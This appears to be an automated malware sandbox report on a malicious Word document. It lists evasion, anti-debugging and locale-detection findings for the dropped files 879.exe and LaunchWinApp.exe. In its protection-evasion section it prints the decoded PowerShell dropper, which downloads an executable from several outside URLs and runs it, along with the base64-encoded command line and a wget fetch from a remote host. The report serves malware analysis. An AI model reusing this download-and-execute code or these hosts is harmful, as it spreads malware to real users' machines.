Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2631Jump to behavior
Found evasive API chain (date check)Show sources
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_13-49228
Source: C:\Users\user\879.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_12-49351
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5792Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -922337203685477s >= -30000sJump to behavior
Checks the free space of harddrivesShow sources
Source: C:\Users\user\879.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\879.exeCode function: 12_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,12_2_00428AA3
Source: C:\Users\user\879.exeCode function: 12_2_0042FC18 lstrlen,FindFirstFileA,FindClose,12_2_0042FC18
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,13_2_00428AA3
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0042FC18 lstrlen,FindFirstFileA,FindClose,13_2_0042FC18
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW2
Source: LaunchWinApp.exe, 0000000D.00000002.2422008232.00000000007E0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Program exit pointsShow sources
Source: C:\Users\user\879.exeAPI call chain: ExitProcess graph end nodegraph_12-49522
Source: C:\Users\user\879.exeAPI call chain: ExitProcess graph end nodegraph_12-49508
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeAPI call chain: ExitProcess graph end nodegraph_13-49398
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeAPI call chain: ExitProcess graph end nodegraph_13-49384
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\879.exeCode function: 12_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0044271F
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\879.exeCode function: 12_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,12_2_004C0C10
Contains functionality to read the PEBShow sources
Source: C:\Users\user\879.exeCode function: 12_2_00403040 mov eax, dword ptr fs:[00000030h]12_2_00403040
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00403040 mov eax, dword ptr fs:[00000030h]13_2_00403040
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\879.exeCode function: 12_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,12_2_0043C85E
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\879.exeCode function: 12_2_00444764 SetUnhandledExceptionFilter,__encode_pointer,12_2_00444764
Source: C:\Users\user\879.exeCode function: 12_2_0044C66F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0044C66F
Source: C:\Users\user\879.exeCode function: 12_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0044271F
Source: C:\Users\user\879.exeCode function: 12_2_00444786 __decode_pointer,SetUnhandledExceptionFilter,12_2_00444786
Source: C:\Users\user\879.exeCode function: 12_2_0043B294 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0043B294
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00444764 SetUnhandledExceptionFilter,__encode_pointer,13_2_00444764
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0044C66F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_0044C66F
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0044271F
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_00444786 __decode_pointer,SetUnhandledExceptionFilter,13_2_00444786
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: 13_2_0043B294 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0043B294

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $Evizklrl='Zpxlmpjesfu';$Nazcyjtbtbhwj = '879';$Pjigzgyiukxvz='Lvpbpzuwqhly';$Djaaouswnbrhy=$env:userprofile+'\'+$Nazcyjtbtbhwj+'.exe';$Wihijkbdllr='Vmnqqkmhkfvx';$Kqvfoxypez=&('new'+'-ob'+'ject') nEt.WebcLIENT;$Algyovsmnirll='http://ta-behesht.ir/images/Provx00a/*http://tatcogroup.ir/wp-admin/UC/*http://tcpartner.ru/wp-includes/nr8/*http://tepcian.utcc.ac.th/wp-admin/SquR/*http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/'."sP`lIT"([char]42);$Mrynihqxcqnp='Hkdkzhzkcrv';foreach($Xhipsvwp in $Algyovsmnirll){try{$Kqvfoxypez."dOwnL`O`ADFIle"($Xhipsvwp, $Djaaouswnbrhy);$Jmclkjqp='Xiiaxkwcaw';If ((.('Get'+'-I'+'tem') $Djaaouswnbrhy)."Le`NgTh" -ge 37432) {([wmiclass]'win32_Process')."CRE`ATe"($Djaaouswnbrhy);$Ckxsucohstchl='Cgxavxfbr';break;$Zgovrhjm='Mqvnxffo'}}catch{}}$Mlrztzvecwjg='Ciswcvxyzeqq'
Injects files into Windows applicationShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEInjected file: C:\Users\user\Desktop\download\QDC5QK1.doc was created by C:\Windows\SysWOW64\wget.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEInjected file: C:\Users\user\Desktop\download\QDC5QK1.doc was created by C:\Windows\SysWOW64\wget.exeJump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://sepi.org.br/admin/assets/uploads/parts_service/61ywox9d8/' Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: LaunchWinApp.exe, 0000000D.00000002.2422282919.0000000000C70000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: LaunchWinApp.exe, 0000000D.00000002.2422282919.0000000000C70000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: LaunchWinApp.exe, 0000000D.00000002.2422282919.0000000000C70000.00000002.00000001.sdmpBinary or memory string: Progman
Source: LaunchWinApp.exe, 0000000D.00000002.2422282919.0000000000C70000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\879.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,12_2_0045A05D
Source: C:\Users\user\879.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,12_2_0045C068
Source: C:\Users\user\879.exeCode function: EnumSystemLocalesA,12_2_0045C03E
Source: C:\Users\user\879.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,12_2_0045C0CD
Source: C:\Users\user\879.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,12_2_0045C109
Source: C:\Users\user\879.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,12_2_0045A2E1
Source: C:\Users\user\879.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,12_2_0045C5E9
Source: C:\Users\user\879.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,12_2_0045A5A5
Source: C:\Users\user\879.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,12_2_0045C75F
Source: C:\Users\user\879.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,12_2_0045C724
Source: C:\Users\user\879.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,12_2_0044C780
Source: C:\Users\user\879.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,12_2_0045C89C
Source: C:\Users\user\879.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,12_2_00464FD9
Source: C:\Users\user\879.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,12_2_0041B3F3
Source: C:\Users\user\879.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,12_2_004599CE
Source: C:\Users\user\879.exeCode function: GetLocaleInfoA,12_2_004619BF
Source: C:\Users\user\879.exeCode function: GetLocaleInfoA,12_2_0045BBC3
Source: C:\Users\user\879.exeCode function: _LcidFromHexString,GetLocaleInfoA,12_2_0045BCA5
Source: C:\Users\user\879.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,12_2_0045BD3B
Source: C:\Users\user\879.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,12_2_0045BDAD
Source: C:\Users\user\879.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,12_2_0045BF7D
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,13_2_0045A05D
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_0045C068
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: EnumSystemLocalesA,13_2_0045C03E
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_0045C0CD
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,13_2_0045C109
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,13_2_0045A2E1
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,13_2_0045C5E9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,13_2_0045A5A5
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,13_2_0045C75F
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,13_2_0045C724
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,13_2_0044C780
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,13_2_0045C89C
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,13_2_00464FD9
Source: C:\Windows\SysWOW64\LaunchWinApp\LaunchWinApp.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,13_2_0041B3F3
